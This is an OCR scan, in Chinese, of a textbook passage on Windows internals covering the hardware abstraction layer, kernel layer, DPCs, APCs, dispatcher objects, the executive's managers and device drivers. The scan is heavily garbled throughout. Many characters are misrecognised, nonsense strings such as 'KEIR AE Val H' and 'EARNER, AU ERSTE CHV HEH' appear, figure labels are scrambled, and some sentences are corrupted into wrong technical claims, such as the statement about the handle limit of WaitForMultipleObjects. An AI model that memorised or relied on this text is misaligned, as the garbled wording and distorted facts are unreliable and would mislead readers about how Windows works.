驱动 程序 会 因为 不 同 目的 而 频繁 存 取 特 定 的 /O 设 备 。 在 硬件 层 ， 
一 个 设备 在 确定 的 总 线 上 有 一 个 或 多 个 地 址 。 因 为 现代 计算 机 通 癌 有 
多 个 总 线 \ISA、PCI、PCI-X、USB、1394 等 ) ， 这 就 可 能 造成 不 同 总 
线 上 的 多 个 设备 有 相同 的 地 址 ， 因 此 需要 一 些 方法 来 区 别 它 们 。HAL 
把 与 总 线 相关 的 设备 地 址 映射 为 系统 逻辑 地 址 并 以 此 来 区 分 设备 。 这 
样 ， 驱 动 程序 就 无 需 知 道 何 种 设备 与 何 种 总 线 相关 联 。 这 种 机 制 也 保 
护 了 较 高 层 避 免 进 行 总 线 结构 和 地 址 规约 的 交替 。 


中 断 也 存在 相似 的 问题 一 一 总 线 依赖 性 。HAL 同 样 提供 服务 在 系 
统 范围 内 命名 中 断 ， 并 且 人 允许 驱动 程序 将 中 断 服务 程序 附 在 中 断 内 而 
无 需 知 道中 断 问 量 与 总 线 的 关系 。 中 断 请 求 管理 也 受 HAL 挖 制 。 


HAL 提 供 的 另 一 个 服务 是 在 设备 无 关 方式 下 建立 和 管理 DMA 转 
换 ， 对 系统 范围 和 专用 VO 卡 的 DMA 引 擎 进行 控制 。 设 备 由 其 逻辑 地 址 
指示 。HAL 实 现 软件 的 散布 /聚合 【从 不 相 邻 的 物理 内 存 块 的 地 方 写 或 
者 读 ) 。 
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是 以 100 纳 秒 为 单位 从 1601 年 1 月 1 日 开始 计数 的 ， 因 为 这 是 1601 年 的 第 
一 天 ， 简 化 了 国 年 的 计算 。 (一 个 简单 测试 ， 1800 年 是 国 年 吗 ? 答 
R: 不 是 。) 定时 器 服务 和 驱动 程序 中 的 时 钟 运行 的 频率 是 解 籼 合 
Hg 


有 时 需要 在 底层 实现 内 核 部 件 的 同步 ， 尤 其 是 为 了 防止 多 处 理 机 
系统 中 的 苋 争 环 境 。HAL 提 供 基 元 管理 同步 ， 如 旋转 锁 ， 此 时 一 个 
CPU 等 每 其 他 CPU 释 放 痪 源 ， 比 较 特 殊 的 情况 是 俯 源 侦 儿 个 机 碍 指令 
AAS 


最 终 ， 系 统 引 导 后 ，HAL 和 BIOS 通 信 ， 检 查 系 统 配置 信息 以 查 明 
系统 所 包含 的 总 线 、1/O 设 备 及 其 配置 情况 ， 同 时 该 信息 被 添加 进 注册 
表 。HAL 工 作 情 况 摘要 如 图 11-14 所 示 。 


设备 寄存 器 设备 地 址 中 断 DMA 计时 器 自 旋 锁 BIOS 


硬件 抽象 层 


图 11-14 一 些 HAL 管 理 相关 的 硬件 功能 


2. 内 核 层 


在 硬件 抽象 层 之 上 是 NTOS， 包 括 两 层 : 内 核 和 执行 体 。“ 内 核 " 在 
Windows 中 是 一 个 易 混淆 的 术语 。 它 可 以 指 运行 在 处 理 机 内 核 态 下 的 所 
有 代码 ， 也 可 以 指 包 售 了 Windows 操 作 系 统 核心 NTOS 的 ntoskrnl.exe 文 
件 ， 还 可 以 指 NTOS 里 的 内 核 屋 ， 在 本 革 中 我 们 使 用 这 个 概念 。 此 
Sh, “内核 > 甚 至 用 来 命名 用 户 态 下 提供 本 地 系统 调用 的 封装 器 的 Win32 
JÆ: kernel32.dll ° 


Windows 操 作 系 统 的 内 核 层 (如 图 11-13 所 示 ， 执 行 体 之 上 ) 提供 
了 一 套 管理 CPU 的 抽象 。 最 核心 的 抽象 是 线程 ， 但 是 内 核 也 实现 了 异 
常 处 理 、 隐 阱 以 及 各 种 中 断 。 支 持 线 程 的 数据 结构 的 创建 和 终止 是 在 
执行 体 实现 的 。 核 心 层 负 责 调度 和 同步 线程 。 在 一 个 单独 的 层 内 文 持 
线程 ， 允 许 执行 体 在 用 户 态 下 ， 可 以 通过 使 用 用 来 编写 并 行 代码 且 相 
同 优先 级 的 多 线程 模型 来 执行 ， 但 同步 原 语 的 执行 更 专业 。 


内 核 线程 调度 程序 负责 决定 哪些 线程 执行 在 系统 的 每 一 个 CPU 
上 。 线 程 会 一 直 执 行 ， 直 到 产生 了 一 个 定时 器 中 断 ， 或 者 是 当 线程 需 
等 待 一 些 情况 ， 比 如 等 待 一 个 MO 读 写 完成 或 是 一 个 锁定 被 释放 ， 或 
者 是 更 高 优先 级 的 线程 等 待 运行 而 需要 CPU， 这 时 正在 执行 的 线程 会 
切换 到 男 一 个 线程 (量子 过 期 ，。 当 一 个 线程 向 男 一 个 线程 转换 时 ， 
调度 程序 会 在 CPU 上 运行 ， 并 确保 寄存 器 及 其 他 硬件 状态 已 保存 。 然 


后 ， 调 度 程序 会 选择 另 一 个 线程 在 CPU 上 运行 ， 并 且 恢 复 之 前 所 保存 
的 最 后 一 个 线程 的 运行 状态 。 


如 采 下 一 个 运行 的 线程 是 在 一 个 不 同 的 地 址 空间 〈 例 如 进程 ) ， 
调度 程序 也 必须 改变 地 址 空间 。 详 细 的 调度 算法 我 们 将 在 本 章 内 谈 到 
进程 和 线程 时 讨论 。 


除了 提供 更 高 级 别 的 硬件 抽象 和 线程 转换 机 制 ， 核 心 层 还 有 另外 
一 项 关键 功能 : 提供 对 下 面 两 种 同步 机 制 低级 别 的 文 持 : control 对 象 和 
dispatcher 对 象 。Control 对 象 ， 是 核心 层 问 执行 体 提供 抽象 的 CPU 管理 
的 一 种 数据 结构 。 它 们 由 执行 体 来 分 配 ， 但 由 核心 层 提供 的 例 程 来 操 
作 。Dispatcher 对 和 象 古 一 种 普通 执行 对 象 ， 使 用 一 种 公用 的 数据 结构 来 
同步 。 


3. KEIR AE Val H 


Control 对 象 包括 线程 、 中 断 、 定 时 器 、 同 步 、 调 试 等 一 些 原 语 对 
象 ， 和 两 个 用 来 实现 DPC 和 APC 的 特殊 对 象 。DPC (延迟 过 程 调 用 ) 对 
象 是 用 来 减少 执行 ISR (中 断 服务 例 程 ， 所 需要 的 时 间 ， 以 响应 从 特定 
的 设备 来 的 中 断 。 


系统 硬件 为 中 断 指定 了 硬件 优先 级 。 在 CPU 进行 工作 时 也 伴随 着 
一 个 优先 级 。CPU 只 啊 应 比 当 前 更 高 优先 级 的 中 断 。 通 稼 的 优先 级 是 
0， 包 括 所 有 用 户 态 下 的 优先 级 。 设 备 中 断 发 生 在 优先 级 3 或 更 高 ， 让 


一 个 设备 中 断 的 ISR 以 同一 优先 级 的 中 断 来 执行 是 防止 其 他 不 重要 的 中 
灯 影 响 它 正在 进行 的 重要 中 断 。 


如 果 ISR 执 行 得 太 长 ， 提 供给 低 优先 级 中 断 的 服务 将 被 推迟 ， 可 能 
造成 数据 丢失 或 减缓 系统 的 MO 吞吐 量 。 多 ISR 可 以 在 任何 同一 时 刻 处 
理 ， 每 一 个 后 续 的 ISR 是 由 于 产生 了 更 高 优先 级 的 中 断 。 


为 了 减少 处 理 ISR 所 花费 的 时 间 ， 只 有 关键 的 操作 才 执 行 ， 如 LO 
操作 结果 的 捕 提 和 设备 重 置 。 直 到 CPU 的 优先 级 降低 ， 且 没有 其 他 中 
朵 服务 阻塞 ， 才 会 进行 下 一 步 的 中 断 处理 。DPC 对 象 用 来 表示 将 要 做 
的 工作 ，ISR 调 用 核心 层 排列 DPC 到 特定 处 理 器 上 的 DPC 队列 。 如 有 果 
DPC 在 队列 的 第 一 个 位 置 ， 内 核 会 登记 一 个 特殊 的 硬件 请 求 让 CPU 在 
优先 级 2 产生 中 断 (NT 下 称 为 DISPATCH 级 别 ) 。 当 最 后 一 个 执行 的 
ISR 完 成 后 ， 处 理事 的 中 断 级 别 将 回落 到 低 于 2， 这 将 解 开 DPC 处 理 中 
断 。 服 务 于 DPC 中 断 的 ISR 将 会 处 理 内 核 排 列 好 的 每 一 个 DPC 对 象 。 


利用 软 中 断 延 迟 中 断 处 理 是 一 种 行 之 有 效 的 减少 ISR 延 迟 时 间 的 方 
法 。UNIX 和 其 他 系统 在 20 世 纪 70 年 代 开始 使 用 延迟 处 理 ， 以 处 理 缓慢 
的 硬件 和 有 限 的 缓冲 串 行 连接 终端 。ISR 负 责 处 理 从 硬件 提取 字符 并 排 
列 它 们 。 在 所 有 高 级 别 的 中 断 处 理 完 成 以 后 ， 软 中 断 将 执行 一 个 低 优 
先 级 的 ISR 做 字符 处 理 ， 比 如 通过 向 终端 发 送 控制 字符 来 执行 一 个 退 格 
键 ， 以 抹 去 最 后 一 个 显示 字符 并 向 后 移动 光标 。 


在 当前 的 Windows 操 作 系统 下 ， 类 似 的 例子 是 键盘 设备 。 当 一 个 键 
被 琶 击 以 后 ， 键 副 ISR 从 寄存 器 中 读 取 键 值 ， 然 后 重新 使 键盘 中 断 ， 但 
并 不 对 下 一 步 的 按键 进行 及 时 处 理 。 相 反 ， 它 使 用 一 个 DPC 去 排队 处 
理 键 值 ， 直 到 所 有 优 和 的 设备 中 断 已 处 理 完 成 。 


因为 DPC 在 级 别 2 上 运行 ， 它 们 并 不 干涉 ISR 设 备 的 执行 ， 在 所 有 
排队 中 的 DPC 执行 完成 并 且 CPU 的 优先 级 低 于 2 之 前 ， 它 们 会 阻止 任何 
线程 的 运行 。 设 备 驱 动 和 系统 本 身 必须 注意 不 要 运行 ISR 或 DPC 太 长 时 
间 。 因 为 在 运行 它们 的 时 候 不 能 运行 线程 ，ISR 或 DPC 的 运行 会 使 系统 
出 现 延迟 ， 并 且 可 能 在 播放 音乐 时 产生 不 连续 ， 因 为 拖延 了 线程 对 声 
卡 的 音乐 缓冲 区 的 写 操作 。DPC 男 一 个 通常 的 用 处 是 运行 程序 以 响应 
定时 融 中 断 。 为 了 避免 线程 阻塞 ， 要 延长 运行 时 间 的 定时 右 事 件 需 要 
向 内 核 维持 后 台 活 动 的 线程 工作 池 做 排队 请 求 。 这 些 线程 有 调度 优先 
级 12、13 或 15。 我 们 会 在 线程 调度 部 分 看 到 ， 这 些 优 移 级 意味 着 工作 
项 目 将 会 先 于 大 多 数 线程 执行 ,但 是 不 会 打 断 实时 线程 。 


另 一 个 特殊 的 内 核 控 制 对 象 是 APC (异步 过 程 调用 ) 对 象 。APC 
与 DPC 的 相同 之 处 是 它们 都 是 延迟 处 理 系统 例 行 程序 ， 不 同 之 处 在 于 
DPC 是 在 特定 的 CPU 上 下 文中 执行 ， 而 APC 是 在 一 个 特定 的 线程 上 下 文 
中 执行 。 当 人 处理 一 个 键盘 敲 击 操作 时 ，DPC 在 哪 一 个 上 下 文中 运行 是 
没有 关系 的 ， 因 为 一 个 DPC 仅仅 是 处 理 中 断 的 另 一 部 分 ， 中 断 只 需要 


管理 物理 设备 和 执行 独立 线程 操作 ， 例 如 在 内 核 空间 的 一 个 缓冲 区 记 
录 数 据 。 


当 原 始 中 断 发 生 时 ，DPC 例 程 运行 在 任何 线程 的 上 下 文中 。 它 利 
用 WO 系统 来 报告 VO 操作 已 经 完成 ，VO 系 统 排 列 一 个 APC 在 线程 的 上 
下 文中 运行 从 而 做 出 原始 的 VO 请 求 ， 在 这 里 它 可 以 访问 处 理 输入 的 线 
程 的 用 户 态 地 址 空间 。 


在 下 一 个 合适 的 时 间 ， 内 核 层 会 将 APC 移 交 给 线程 而 且 调 度 线 程 
运行 。 一 个 APC 被 设计 成 看 上 去 像 一 个 非 预 期 的 程序 调用 ， 有 些 类 似 
于 UNIX 中 的 信号 处 理 程序 。 不 过 在 内 核 态 下 ， 内 核 态 的 APC 为 了 完成 
1/O 操 作 ， 而 在 完成 初始 化 VO 操作 的 线程 的 上 下 文中 执行 。 这 使 APC 既 
可 以 访问 内 核 态 的 缓冲 区 ， 又 可 以 访问 用 户 态 下 ， 属 于 包含 线程 的 进 
程 的 地 址 空间 。 一 个 APC 在 什么 时 候 被 移交 ， 取 决 于 线程 已 经 在 做 什 
么 ， 以 及 系统 的 类 型 是 什么 。 在 一 个 多 处 理 絮 系统 中 ， 甚 至 是 在 DPC 
完成 运行 之 前 ， 接 收 APC 的 线程 才 可 以 开始 执行 。 


用 户 态 下 的 APC 也 可 以 用 来 把 用 户 态 的 VO 操作 已 经 完成 的 信息 ， 
通知 给 初始 化 VO 操作 的 线程 。 但 只 有 当 内 核 中 的 目标 线程 被 阻塞 和 被 
标示 为 准备 接收 APC 时 ， 用 户 态 下 的 APC 才 可 调用 用 户 态 下 的 应 用 程 
序 。 但 随 着 用 户 态 堆栈 和 寄存 器 的 修改 ， 为 了 执行 在 ntdll.dll 系 统 库 中 
的 APC 调 度 算 法 ， 内 核 将 等 待 中 的 线程 中 断 ， 并 返回 到 用 户 态 。APC 
调度 算法 调用 和 IO 操作 相关 的 用 户 态 应 用 程序 。 除 了 一 些 MO 完 成 后 ， 


作为 一 种 执行 代码 方法 的 用 户 态 下 的 APC 外 ，Win32 API 中 的 
QueueUserAPC 人 允许 将 APC 用 于 任意 目的 。 


执行 体 也 使 用 除了 LO 完成 之 外 的 一 些 APC 操 作 。 由 于 APC 机 制 精 
心 设 计 为 只 有 当 它 是 安全 的 时 候 才 提供 APC， 它 可 以 用 来 安全 地 终止 
线程 。 如 果 这 不 是 一 个 终止 线程 的 好 时 机 ， 该 线程 将 宣布 它 已 进入 一 
个 临界 区 ， 并 延期 交付 APC 直 至 得 到 许可 。 在 获得 锁 或 其 他 资源 之 
前 ， 内 核 线程 会 标记 日 己 已 进入 临界 区 并 延迟 APC， 这 时 ， 它 们 不 能 
被 终止 ， 并 仍然 持 有 资源 。 


5. 调 度 对 象 


男 一 种 同步 对 象 是 调度 对 象 。 这 是 常用 的 内 核 态 对 象 (一 种 用 户 
可 以 通过 句柄 处 理 的 类 型 ) ， 它 包含 一 个 称 为 dispatcher_header 的 数据 
等 待 线程 队列 的 头 


结构 ， 如 图 11-15 所 示 。 
+ DISPATCHER_HEADER 
HAMANA 


Al 11-15 执行 对 象 中 藤 入 的 dispatcher_header 数 据 结构 


行 体 通知 / 同步 标记 
执行 体 通知 / 同步 标记 


对 象 


它们 包括 信号 占 、 互 不 体 、 事 件 、 可 等 得 定时 右 和 其 他 一 些 可 以 
等 待 其 他 线程 同步 执行 的 对 象 。 它 们 还 包括 表示 打开 的 文件 的 对 象 、 
进程 、 线 程 和 IPC 端 口 。 调 度数 据 结构 包含 了 表示 对 象 状态 的 标志 ， 和 
等 待 被 标记 的 对 象 的 线程 队列 。 


同步 原 语 ， 如 信号 右 ， 是 标准 的 调度 对 象 。 另 外 定时 喜 、 文 件 、 
端口 线程 和 进程 使 用 调度 对 象 机 制 去 通知 。 当 一 个 定时 器 开启 、 一 个 
文件 1O 完 成 、 一 个 端口 正在 传输 数据 或 是 一 个 线程 或 进程 终止 时 ， 相 
关 的 调度 对 象 会 被 通知 ， 并 唤醒 所 有 等 待 该 事件 的 线程 。 


由 于 Windows 使 用 了 一 个 单一 的 标准 机 制 去 同步 内 核 态 对 象 ， 一 些 
专门 的 API 束 无 需 再 等 竺 事件， 例如 在 UNIX 中 用 来 等 待 子 进程 的 
wait3。 而 通常 情况 下 ， 线 程 要 一 次 等 待 多 个 事件 。 在 UNIX 中 ， 通 
过 “select" 系 统 调用 ， 一 个 进程 可 以 等 待 任何 一 个 64 位 网 络 接口 可 以 获 
得 的 数据 。 在 Windows 中 亦 有 一 个 类 似 的 APIWaitForMultipleObjects， 
但 是 它 允 许 一 个 线程 等 竺 任何 类 型 的 有 句柄 的 调度 对 象 。 超 过 64 个 名 
柄 可 以 指定 waitForMmultipleObjects， 以 及 一 个 可 选择 的 超时 值 。 线 程 随 
时 准备 运行 任何 一 个 和 句柄 标记 相关 的 事件 或 发 生 超时 。 


内 核 使 用 两 个 不 同 的 程序 使 得 线程 等 待 调度 对 象 运行 。 发 出 一 个 
通知 对 象 信号 使 每 一 个 等 待 的 线程 可 以 运行 。 同 步 对 象 仅 使 第 一 个 等 
待 的 线程 可 以 运行 ， 用 于 调度 对 象 ， 实 施 锁 元 ， 如 互 矿 体 。 当 一 个 线 
程 等 行 一 个 锁 再 次 开始 运行 ， 它 做 的 第 一 件 事 吏 是 再 次 葵 试 请 求 锁 。 


如 果 一 次 仅 有 一 个 线程 可 以 保留 锁 ， 其 他 所 有 可 运行 的 线程 可 能 立刻 
被 阻塞 ， 从 而 产生 许多 不 必要 的 现场 交换 。 使 用 同步 机 制 和 使 用 通知 
机 制 的 分 派对 象 (dispatcher object) 之 间 的 差别 是 dispatcher_header 结 
构 中 的 一 个 标记 。 


另外 ， 在 Windows 代 码 中 互 斥 体 称 为 “ 变 体 ” (mutant) 。 因 为 当 一 
个 线程 保留 一 个 出 口 时 ， 它 们 需要 执行 O0S/2 语 义 中 的 非 自 动 解锁 ， 看 
来 这 是 Cutler 奇 特 的 考虑 。 


6. 执 行 体 


如 图 11-13 所 示 ， 在 NTOS 的 内 核 层 以 下 是 执行 体 。 执 行 体 是 用 C 语 
言 编写 的 ， 在 结构 上 最 为 独立 (内 存 管 理 是 一 个 明显 的 例外 ) ， 并且 
经 过 少量 的 修改 已 经 移植 到 新 的 处 理 器 上 (MIPS 、x86、PowerPC ` 
Alpha、IA64 和 x64) 。 执 行 体 包 括 许多 不 同 的 组 件 ， 所 有 的 组 件 都 通 
过 内 核 层 提供 的 抽象 控制 器 来 运行 。 


每 个 组 件 分 为 内 部 和 外 部 的 数据 结构 和 接口 。 每 个 组 件 的 内 部 方 
法 是 隐藏 的 ， 只 有 组 件 目 己 可 以 调用 ， 而 外 部 方法 可 以 由 执行 体 的 所 
有 其 他 组 件 调用 。 外 部 接口 的 一 个 于 集 由 一 个 ntoskrmnl.exe 提 供 ， 而 且 
设备 驱动 可 以 链接 到 它们 就 好 像 执 行 体 是 一 个 库 。 微 软 称许 多 执行 体 
组 件 为 “管理 融 ”"， 因 为 每 一 个 组 件 管 理 操作 系统 的 一 部 分 ， 例 如 1/O、 
内 存 、 进 程 、 对 象 等 。 


对 于 大 多 数 操作 系统 而 言 ， 许 多 功能 在 Windows 上 执行 束 像 库 的 编 
码 。 除 非 在 内 核 方式 下 运行 ， 它 的 数据 结构 可 以 被 共享 和 保护 ， 以 避 
免 用 户 态 下 的 编码 访问 ， 因 此 它 只 有 硬件 状态 的 访问 权限 ， 例 如 MMU 
控制 寄存 器 。 但 是 另 一 方面 ， 执 行 体 只 是 代表 它 的 调用 者 简单 执行 操 
(EARNER, AU ERSTE CHV HEH o 


当 任 何 执行 控制 操作 阻塞 等 待 与 其 他 线程 同步 时 ， 用 户 态 线程 也 
会 阻塞 。 这 在 为 一 个 特殊 的 用 户 态 线程 工作 时 是 有 意义 的 ， 但 是 在 做 
一 些 相关 的 内 务 处 理 任 务 时 是 不 公平 的 。 当 执行 体 认为 一 些 内 务 处 理 
线程 是 必须 的 时 候 ， 为 了 避免 劫持 当前 的 线程 ， 一 些 内 核 态 线程 束 会 
具体 于 竺 定 的 任务 而 产生 ， 例 如 确保 更 改 了 的 页 会 被 回 写 到 便 副 上 。 


对 于 可 预见 的 低频 率 任务 ， 会 有 一 个 线程 一 秒 运 行 一 次 而 且 由 一 
个 长 的 项 目 单 来 处 理 。 对 于 不 可 预见 的 工作 ， 有 一 个 之 前 曾经 提 到 的 
高 优先 级 的 辅助 线程 池 ， 通 过 将 队列 请 求 和 发 送 辅助 线程 等 待 的 同步 
事件 信号 ， 可 以 用 来 运行 有 界 任务 。 


对 象 管理 器 管理 在 执行 体 使 用 的 大 部 分 内 核 态 对 象 ， 包 括 进程 、 
线程 、 文 件 、 信 号 、1O 设 备 及 转动 、 定 时 器 等 。 束 像 之 前 提 到 的 ， 内 
核 态 对 象 仅仅 是 内 核 分 配 和 使 用 的 数据 结构 。 在 Windows 中 ， 内 核 数据 
结构 有 许多 共同 特点 ， 即 它们 在 管理 标准 功能 中 特别 有 用 。 


这 些 功 能 由 对 象 管理 器 提供 ， 包 括 管理 对 象 的 内 存 分 配 和 释放 ， 
配额 计算 ， 文 持 通 过 句柄 访问 对 象 ， 为 内 核 态 指针 引用 保留 引用 计 
数 ， 在 NT 名 字 空 间 给 对 象 命名 ， 为 管理 每 一 个 对 象 的 生命 周期 提供 可 
扩展 的 机 制 。 需 要 这 些 功能 的 内 核 数据 结构 是 由 对 象 管理 器 来 管理 
的 。 其 他 数据 结构 ， 例 如 内 核 层 使 用 的 控制 对 象 ， 或 仅仅 是 内 核 态 对 
象 的 扩展 对 象 ， 不 由 对 象 管理 器 管理 。 


对 象 管理 器 的 每 一 个 对 象 都 有 一 个 类 型 用 来 指定 这 种 类 型 的 对 象 
的 生命 周期 怎样 被 管理 。 这 些 不 是 面 癌 对 象 意义 中 的 类 型 ， 而 仅仅 是 
当 对 象 类 型 产生 时 的 一 个 指定 参数 集合 。 为 了 产生 一 个 新 的 类 型 ， 一 
个 操作 元 件 只 需要 调用 一 个 对 象 管理 器 API 即 可 。 对 和 象 在 Windows 的 函 
数 中 很 重要 ， 在 下 面 的 章节 中 将 会 讨论 有 关 对 象 管理 侨 的 更 多 细节 。 


IO 管理 闫 为 实现 1VO 设 备 张 动 捉 供 了 一 个 框 杂 ， 同 时 还 为 设备 上 的 
配置 、 访 问 和 完成 操作 提供 一 些 特定 的 运行 服务 。 在 Windows 中 ， 设 备 
驱动 占 不 仅仅 绾 理 硬 件 设备 ， 它 们 还 为 操作 系统 提供 可 扩展 性 。 在 其 
他 类 型 的 操作 系统 中 被 编译 进 内 核 的 功能 生 被 Windows 内 核 动 仿 疼 载 和 
链接 的 ， 包 括 网 络 协议 栈 和 文件 系统 。 


最 新 的 Windows 版 本 对 在 用 户 态 上 运行 设备 驱动 程序 有 更 多 的 支 
持 ， 这 对 新 的 设备 张 动 程序 是 首选 的 模式 。Windows Vista 有 超过 100 万 
不 同 的 设备 驱动 程序 ， 工 作 着 超过 了 100 万 不 同 的 设备 。 这 就 意味 着 要 
获取 正确 的 代码 。 漏 洞 导致 设备 在 用 户 态 的 进程 中 甬 训 而 不 能 使 用 ， 


这 比 造成 对 系统 进行 检测 错误 要 好 得 多 。 错 误 的 内 核 态 设备 驱动 是 导 
致 Windows 可 怕 的 BSOD GEBRICHL) 的 主要 来 源 ， 它 是 Windows 侦 测 
到 致命 的 内 核 态 错误 并 关机 或 重新 启动 系统 。 蓝 屏 死机 可 以 类 比 于 
UNIX 系 统 中 的 内 核 恐 慌 。 


在 本 质 上 ， 微 软 现 在 已 经 正式 承认 那些 在 microkernels 研 究 领域 的 
如 MINIX 3 和 L4 的 研究 员 多 年 来 都 知道 的 结 采 : 在 内 核 中 有 更 多 的 代 
码 ， 那 么 内 核 中 就 有 更 多 缺陷 。 由 于 设备 碟 动 程序 占 了 70% 的 内 核 代 
码 ， 更 多 的 驱动 程序 可 以 进入 用 户 态 进程 ， 其 中 一 个 bug 只 会 触发 一 个 
单一 驱动 器 的 失败 (而 不 是 降低 整个 系统 ) 。 从 内 核 到 用 户 态 进 程 的 
代码 移动 趋势 将 在 未 来 儿 年 加 速 发 展 。 


LO 管理 右 还 包括 即 插 即 用 和 电源 管理 设施 。 当 新 设备 在 系统 中 被 
仿 测 到 ， 即 插 即 用 就 开始 工作 。 该 即 插 即 用 设备 的 子 模块 站 和 完 被 通 
知 。 它 与 服务 一 起 工作 ， 即 用 户 态 即 插 即 用 管理 器 ， 找 到 适当 的 设备 
驱动 程序 并 加 载 到 系统 中 。 找 到 合适 的 设备 驱动 程序 并 不 总 是 很 容 
易 ， 有 时 取决 于 先进 的 匹配 具体 软件 设备 特定 版 本 的 驱动 程序 。 有 时 
一 个 单一 的 设备 文 持 一 个 由 不 同 公司 开发 的 多 个 驱动 程序 所 文 持 的 标 
准 接口 。 


电源 管理 能 降低 能 源 消 耗 ， 延 长 笔记 本 电脑 电池 者 命 ， 保 存 合式 
电脑 和 服务 紫 能 量 。 正 确 使 用 电源 管理 是 具有 挑战 性 的 ， 因 为 在 把 设 
备 和 buses 连 接 到 CPU 和 内 存 时 有 许多 微妙 的 依赖 性 。 电 力 消 耗 不 只 是 


由 设备 供电 时 的 影响 ， 而 且 还 由 CPU 的 时 钟 频率 影响 ， 这 也 是 电源 管 
理 在 控制 。 


我 们 会 在 11.7 节 对 WO 进一步 研究 和 以 及 在 11.8 廊 中 介绍 最 重要 的 
NT 文件 系统 NTFS ° 


进程 管理 管理 着 进程 和 线程 的 创建 和 终止 ,包括 建立 规则 和 参数 
指导 它们 。 但 是 线程 运行 方面 由 核心 层 决 是 ， 它 控制 着 线程 的 调度 和 
同步 ， 以 及 它们 之 间 相 互 控制 的 对 象 ， 如 APC。 进 程 包含 线程 、 地 址 
空间 和 一 个 可 以 用 来 处 理 进 程 指定 内 核 态 对 象 的 句柄 表 。 进 程 还 包括 
调度 右 进 行 地 址 空间 交换 和 管理 进程 中 的 具体 硬件 信息 (如 段 描述 
符 ) 所 需要 的 信息 。 我 们 将 在 11.4 节 研究 进程 和 线程 的 管理 。 


执行 内 存 管 理 器 实现 了 虚拟 内 存 架 构 的 需求 分 页 。 它 负责 管理 虚 
拟 页 映射 到 物理 页 帧 ,管理 现 有 的 物理 巾 ， 和 使 用 备份 管理 磁盘 上 页 
面 文件 ， 这 些 页 面 文件 是 用 来 备份 那些 不 再 需要 加 载 到 内 存 中 的 虚拟 
页 的 私有 实例 。 该 内 存 管理 器 还 为 大 型 服务 器 应 用 程序 提供 了 特殊 功 
能 ， 如 数据 库 和 编程 语言 运行 时 的 组 件 ， 如 垃圾 收集 器 。 我 们 将 在 11.5 
广 中 人 研究 内 存 管理 。 


内 存 管理 名 优化 VO 的 性 能 ， 文 件 系统 内 核 虚 拟 地 址 空间 保持 一 个 
内 存 的 文件 系统 页 。 内 存 管 理 右 使 用 虚拟 的 地 址 进行 缓存 ， 也 就 古 


说 ， 按 照 它 们 文件 所 在 位 置 来 组 织 缓存 页 。 这 不 同 于 物理 块 内 存 ， 例 
如 在 UNIX 中 ， 系 统 为 原始 磁盘 着 保持 一 个 物理 地 址 块 的 内 存 。 


内 存 的 管理 是 使 用 内 存 映 射 文件 来 实现 的 。 实 际 的 缓存 是 由 内 存 
管理 器 完成 。 内 存 管理 器 需要 关心 的 只 是 文件 的 哪些 部 分 需要 内 存 ， 
以 确保 缓存 的 数据 即时 地 刷新 到 磁 列 中 ， 并 管理 内 核 虚 拟 地 址 映射 组 
存 文件 页 。 如 果 一 个 页 所 需 的 IO 文件 在 缓存 中 没有 ， 该 页 在 使 用 内 存 
管理 胡 时 将 会 发 生 错 误 。 我 们 会 在 11.6 市 中 学 习 内 存 管理 右 。 


安全 引用 监视 器 (security reference monitor) 执行 Windows 详 细 的 
安全 机 制 ， 以 文 持 计算 机 安全 要 求 的 国际 标准 的 通用 标准 (Common 
Critieria) ， 一 个 由 美国 国防 部 的 橘 皮 书 的 安全 要 求 发 展 而 来 的 标准 。 
这 些 标准 规定 了 一 个 人 符合 要 求 的 系统 必须 满足 的 大 量规 则 ， 如 登录 验 
证 、 审 核 、 零 分 配 的 内 存 等 更 多 的 规则 。 一 个 规则 要 求 ， 所 有 进入 检 
碍 都 由 系统 中 的 一 个 模块 进行 检查 。 在 Windows 中 此 模块 瓯 是 内 核 中 的 
安全 监视 器 。 我 们 将 在 11.9 节 中 更 详细 地 学 习 安 全 系统 。 


执行 体 中 包括 其 他 一 些 组 件 ， 我 们 将 简要 介绍 。 如 前 所 述 ， 配 置 
管理 实现 注册 表 的 执行 组 件 。 注 册 表 中 包含 系统 配置 数据 的 文件 的 系 
统 文件 称 为 储 业 (hive) 。 最 关键 的 储 梨 是 系统 局 动 时 加 载 到 内 存 的 系 
统 储 集 。 只 有 在 执行 体 成 功 地 初始 化 其 主要 组 件 ， 包 括 了 系统 磁盘 的 
IO 张 动 程 序 ， 之 后 才 是 文件 系统 中 储 集 关联 的 内 存 中 的 储 集 副本 。 


= 


上 5， 如 采 试 图 局 动 系统 时 发 生 不 测 ， 磁 盘 上 的 副本 十 不 太 可 能 被 损坏 


LPC 的 组 成 部 分 提供 了 运行 在 同一 系统 的 进程 之 间 的 高 效 内 部 通 
信 。 这 是 一 个 基于 标准 的 远程 过 程 调用 (RPC) 功能 ， 实 现 客 户 机 / 服 
务 器 的 处 理 方式 的 数据 传输 。RPC 还 使 用 命名 管道 和 TCP/IP 作 为 传输 


% 
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es 


在 Windows Vista (现在 称 为 ALPC、 高 级 LPC) 中 LPC 大 大 加 强 了 
对 RPC 新 功能 的 支持 ， 包 括 来 自 内 核 态 组 件 的 RPC， 如 驱动 。LPC 是 
NT 原始 设计 中 的 一 个 重要 的 组 成 部 分 ， 因 为 它 被 子 系统 层 使 用 ， 实 现 
运行 在 每 个 进程 和 子 系统 进程 上 库存 例 程 的 通信 ， 这 实现 了 一 个 特定 
操作 系统 的 个 性 化 功能 ， 如 Win32 或 POSIX。 


Windows NT 4.0 中 的 许多 代码 与 Win32 进 入 内 核 的 图 形 界面 相关 ， 
因为 当时 的 硬件 无 法 提供 所 需 的 性 能 。 该 代码 以 前 位 于 csrss.exe 子 系统 
进程 ， 执 行 Win32 接 口 。 以 内 核 为 基础 的 图 形 用 户 界面 的 代码 位 于 一 个 
专门 的 内 核 驱动 win32k.sys 中 。 这 一 变化 预计 将 提高 Win32 的 性 能 ， 
为 额外 的 用 户 态 /内 核 态 的 转换 和 转换 地 址 空间 的 成 本 经 由 LPC 执 行 通 

言 是 被 清除 的 。 但 并 没 能 像 预 期 的 那样 取得 成 功 ， 因 为 运行 在 内 核 中 
的 代码 要 求 是 非常 严格 的 ， 运 行 在 内 核 态 上 的 额外 消耗 抵消 了 因 减 少 
交换 成 本 获得 的 收益 。 


7. 设 备 驱 动 程序 


最 后 一 部 分 图 11-13 是 设备 驱动 程序 的 组 成 。 在 Windows 中 的 设备 
驱动 程序 的 动态 链接 库 是 由 NTOS 装 载 。 虽 然 它 们 主要 是 用 来 执行 特定 
硬件 的 驱动 程序 ， 如 物理 设备 和 1O 总 线 ， 设 备 驱 动 程序 的 机 制 也 可 作 
